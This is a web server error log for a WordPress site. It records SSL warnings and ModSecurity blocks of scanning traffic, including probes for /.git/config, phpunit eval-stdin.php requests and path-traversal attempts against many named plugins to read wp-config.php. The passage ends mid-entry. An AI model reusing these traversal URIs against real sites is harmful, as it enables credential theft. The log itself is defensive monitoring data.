[ssl:warn] [pid 22007:tid 140636500666240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 26 03:31:23.439775 2022] [ssl:warn] [pid 22007:tid 140636500666240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 26 03:31:25.466009 2022] [ssl:warn] [pid 22007:tid 140636500666240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 26 03:31:27.839195 2022] [ssl:warn] [pid 22461:tid 139836831733632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 26 03:31:27.948172 2022] [ssl:warn] [pid 22462:tid 139836831733632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2022/09/26 20:02:30 [error] 22309#22309: *62157 access forbidden by rule, client: 54.176.208.90, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Mon Sep 26 20:25:07.046558 2022] [:error] [pid 23093:tid 139836634347264] [client 5.188.62.174:51740] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "YzJQ82adhEHQghaYhcKh2QAAAMI"] 2022/09/27 01:46:43 [error] 22310#22310: *68602 access forbidden by rule, client: 54.176.208.90, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Sep 27 03:11:14.674106 2022] [ssl:warn] [pid 1034:tid 139980970223488] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 27 03:11:14.835371 2022] [ssl:warn] [pid 1035:tid 139980970223488] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 27 03:11:15.216064 2022] [ssl:warn] [pid 1035:tid 139980970223488] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 27 03:11:17.170125 2022] [ssl:warn] [pid 1035:tid 139980970223488] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 27 03:11:19.488790 2022] [ssl:warn] [pid 1465:tid 140584368367488] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 27 03:11:19.608241 2022] [ssl:warn] [pid 1466:tid 140584368367488] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2022/09/27 12:03:05 [error] 1347#1347: *88785 access forbidden by rule, client: 44.234.41.25, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2022/09/27 16:03:25 [error] 1346#1346: *92350 access forbidden by rule, client: 185.220.101.136, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2022/09/27 16:03:28 [error] 1347#1347: *92362 access forbidden by rule, client: 199.249.230.168, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2022/09/27 19:31:51 [error] 1347#1347: *104306 access forbidden by rule, client: 81.19.140.13, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" [Tue Sep 27 20:07:25.563991 2022] [autoindex:error] [pid 1485:tid 140584170981120] [client 95.216.106.100:35318] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/wp-includes/SimplePie/index.php [Tue Sep 27 20:07:41.285933 2022] [autoindex:error] [pid 1485:tid 140584018740992] [client 95.216.106.100:35370] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/css/index.php?673435=1 [Wed Sep 28 03:39:18.072573 2022] [ssl:warn] [pid 30010:tid 140281200244608] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 28 03:39:18.220861 2022] [ssl:warn] [pid 30011:tid 140281200244608] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 28 03:39:18.622362 2022] [ssl:warn] [pid 30011:tid 140281200244608] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 28 03:39:20.818749 2022] [ssl:warn] [pid 30011:tid 140281200244608] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 28 03:39:23.068319 2022] [ssl:warn] [pid 30440:tid 140059247773568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 28 03:39:23.171690 2022] [ssl:warn] [pid 30441:tid 140059247773568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 28 18:37:58.365469 2022] [ssl:warn] [pid 30441:tid 140059247773568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2022/09/28 18:52:07 [error] 2207#2207: *131042 access forbidden by rule, client: 3.75.223.185, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/09/28 18:52:07 [error] 2206#2206: *131043 access forbidden by rule, client: 3.75.223.185, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/09/28 18:52:07 [error] 2206#2206: *131046 access forbidden by rule, client: 3.75.223.185, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/09/28 18:52:08 [error] 2207#2207: *131047 access forbidden by rule, client: 3.75.223.185, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/09/28 18:52:08 [error] 2206#2206: *131050 access forbidden by rule, client: 3.75.223.185, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/09/28 18:52:08 [error] 2206#2206: *131052 access forbidden by rule, client: 3.75.223.185, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/09/29 01:47:07 [error] 2207#2207: *137851 access forbidden by rule, client: 13.38.250.50, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/09/29 01:47:07 [error] 2207#2207: *137852 access forbidden by rule, client: 13.38.250.50, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/09/29 01:47:08 [error] 2207#2207: *137853 access forbidden by rule, client: 13.38.250.50, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/09/29 01:47:08 [error] 2207#2207: *137854 access forbidden by rule, client: 13.38.250.50, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/09/29 01:47:08 [error] 2207#2207: *137857 access forbidden by rule, client: 13.38.250.50, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/09/29 01:47:08 [error] 2206#2206: *137858 access forbidden by rule, client: 13.38.250.50, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Sep 29 03:40:23.616976 2022] [ssl:warn] [pid 27050:tid 140048958039936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 29 03:40:23.741709 2022] [ssl:warn] [pid 27051:tid 140048958039936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 29 03:40:24.149165 2022] [ssl:warn] [pid 27051:tid 140048958039936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 29 03:40:26.264104 2022] [ssl:warn] [pid 27051:tid 140048958039936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 29 03:40:28.488085 2022] [ssl:warn] [pid 27690:tid 140111795414912] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 29 03:40:28.597699 2022] [ssl:warn] [pid 27691:tid 140111795414912] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 29 18:00:41.859423 2022] [ssl:warn] [pid 27691:tid 140111795414912] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 29 18:33:25.343541 2022] [ssl:warn] [pid 27691:tid 140111795414912] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 29 18:33:52.416976 2022] [ssl:warn] [pid 27691:tid 140111795414912] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 30 03:14:18.250860 2022] [ssl:warn] [pid 30738:tid 140084749854592] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 30 03:14:18.383361 2022] [ssl:warn] [pid 30739:tid 140084749854592] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 30 03:14:18.897371 2022] [ssl:warn] [pid 30739:tid 140084749854592] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 30 03:14:21.113968 2022] [ssl:warn] [pid 30739:tid 140084749854592] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 30 03:14:23.367050 2022] [ssl:warn] [pid 31160:tid 139880692230016] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 30 03:14:23.517020 2022] [ssl:warn] [pid 31161:tid 139880692230016] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 30 03:49:30.884187 2022] [autoindex:error] [pid 32649:tid 139880424265472] [client 80.76.51.29:53046] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Sep 30 04:04:08.311669 2022] [autoindex:error] [pid 31848:tid 139880399087360] [client 20.25.47.57:53312] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Sep 30 16:28:24.481398 2022] [:error] [pid 31183:tid 139880256411392] [client 41.216.188.218:39368] [client 41.216.188.218] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".xsd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/indeed-membership-pro/classes/PaymentGateways/mollie/vendor/phpunit/phpunit/phpunit.xsd"] [unique_id "YzdfeF0x0HJZqDS1plhGEAAAAJY"], referer: www.google.com [Fri Sep 30 18:56:58.339481 2022] [autoindex:error] [pid 32649:tid 139880441050880] [client 20.55.110.224:41888] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Sep 30 19:46:19.314044 2022] [:error] [pid 32649:tid 139880357123840] [client 41.216.188.218:42804] [client 41.216.188.218] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".xsd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/indeed-membership-pro/classes/PaymentGateways/mollie/vendor/phpunit/phpunit/phpunit.xsd"] [unique_id "YzeN21xff8uJOLjYbp4heQAAAQo"], referer: www.google.com [Fri Sep 30 21:16:08.637496 2022] [:error] [pid 31848:tid 139880289982208] [client 65.108.157.188:44878] [client 65.108.157.188] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "29"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "Yzei6L2S9_p-U-yGuVRTpwAAANI"], referer: anonymousfox.co [Sat Oct 01 03:49:29.640175 2022] [ssl:warn] [pid 15481:tid 140027423565696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Oct 01 03:49:29.781578 2022] [ssl:warn] [pid 15482:tid 140027423565696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Oct 01 03:49:32.642197 2022] [ssl:warn] [pid 15482:tid 140027423565696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Oct 01 03:49:34.173961 2022] [ssl:warn] [pid 15482:tid 140027423565696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Oct 01 03:49:36.452519 2022] [ssl:warn] [pid 15905:tid 139813190211456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Oct 01 03:49:36.571507 2022] [ssl:warn] [pid 15906:tid 139813190211456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Oct 01 10:08:34.009256 2022] [:error] [pid 16238:tid 139812812035840] [client 37.115.193.107:43874] [client 37.115.193.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/jquery-mega-menu/skin.php?skin=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/jquery-mega-menu/skin.php"] [unique_id "YzhX8iaQuK6EVYWjtq8dfAAAAM8"] [Sat Oct 01 10:08:37.374309 2022] [:error] [pid 15924:tid 139812778465024] [client 37.115.193.107:43884] [client 37.115.193.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/jrss-widget/proxy.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/jrss-widget/proxy.php"] [unique_id "YzhX9YISLyW7RiiuwKU9KgAAAFM"] [Sat Oct 01 10:08:40.980621 2022] [:error] [pid 16238:tid 139812753286912] [client 37.115.193.107:43890] [client 37.115.193.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/justified-image-grid/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/justified-image-grid/download.php"] [unique_id "YzhX-CaQuK6EVYWjtq8dfwAAANY"] [Sat Oct 01 10:08:44.045398 2022] [:error] [pid 15925:tid 139812812035840] [client 37.115.193.107:43896] [client 37.115.193.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/livesig/livesig-ajax-backend.php?wp-root=..%2F..%2F..%2Fwp-config.php&action=asdf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/livesig/livesig-ajax-backend.php"] [unique_id "YzhX_H-27dX3c2O5qS_dNwAAAI8"] [Sat Oct 01 10:08:46.970125 2022] [:error] [pid 15925:tid 139812778465024] [client 37.115.193.107:43900] [client 37.115.193.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/localize-my-post/ajax/include.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "YzhX_n-27dX3c2O5qS_dOAAAAJM"] [Sat Oct 01 10:08:50.094263 2022] [:error] [pid 15925:tid 139812820428544] [client 37.115.193.107:43902] [client 37.115.193.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mac-photo-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-load.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mac-photo-gallery/macdownload.php"] [unique_id "YzhYAn-27dX3c2O5qS_dOQAAAI4"] [Sat Oct 01 10:08:52.870885 2022] [:error] [pid 15925:tid 139812929533696] [client 37.115.193.107:43916] [client 37.115.193.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "YzhYBH-27dX3c2O5qS_dOgAAAIE"] [Sat Oct 01 10:08:55.550576 2022] [:error] [pid 15924:tid 139812820428544] [client 37.115.193.107:43920] [client 37.115.193.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mailz/lists/config/config.php?wpabspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mailz/lists/config/config.php"] [unique_id "YzhYB4ISLyW7RiiuwKU9LAAAAE4"] [Sat Oct 01 10:08:58.268743 2022] [:error] [pid 15925:tid 139812744894208] [client 37.115.193.107:43924] [client 37.115.193.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "YzhYCn-27dX3c2O5qS_dOwAAAJc"] [Sat Oct 01 10:09:00.791750 2022] [:error] [pid 16238:tid 139812736501504] [client 37.115.193.107:43928] [client 37.115.193.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: 